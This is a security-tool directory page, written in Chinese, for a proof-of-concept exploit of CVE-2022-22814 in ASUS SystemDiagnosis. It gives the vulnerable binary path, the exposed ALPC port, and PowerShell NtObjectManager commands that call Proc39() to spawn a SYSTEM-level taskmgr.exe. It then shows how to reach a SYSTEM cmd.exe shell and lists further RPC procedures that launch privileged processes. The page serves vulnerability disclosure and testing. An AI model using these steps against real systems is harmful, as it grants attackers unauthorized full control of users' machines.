Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/dshankle/cve-2022-22814_poc
权限提升漏洞分析漏洞利用渗透测试二进制利用
GitHubdshankle/cve-2022-22814_poc

CVE-2022-22814_PoC

CVE-2022-22814 的概念验证利用程序,演示了通过存在漏洞的华硕 SystemDiagnosis ALPC RPC 接口在 Windows 上实现本地权限提升。

查看仓库
34年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

权限提升 - AsusSystemDiagnosis.exe - Proc39()

完整路径: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe

问题:

由 AsusSystemDiagnosis.exe 暴露的 ALPC 端口 \RPC Control\ASHWTestServer 对所有用户完全可访问。通过此端口调用 RPC 的 Proc39() 会在当前用户会话中生成一个以 SYSTEM 权限运行的 taskmgr.exe 进程。

利用:

利用 Project Zero 的 NtObjectManager RPC 工具(来自 https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools,请确保使用编译好的版本),可以连接到易受攻击的 RPC 端口,然后调用 Proc39()。一旦生成了 SYSTEM 权限的 taskmgr.exe 进程,就可以通过上下文菜单中的“运行新任务”功能(文件 > 运行新任务 > cmd.exe)创建一个 cmd.exe shell。

NtObjectManager:

$server = get-rpcserver C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe

$client = get-rpcclient $server

$client.connect()

$client.Proc39()

权限提升 - AsusSystemDiagnosis.exe - Proc40()

与上述相同,但生成以 SYSTEM 权限运行的 mmc.exe。可以创建新任务,或使用浏览功能打开 explorer.exe 窗口并从地址栏执行 cmd.exe。

附加说明:

  • Proc53() - 生成以 SYSTEM 权限运行的 systemreset.exe
  • Proc54() - 生成以 SYSTEM 权限运行的 RecoveryDrive.exe
下载工具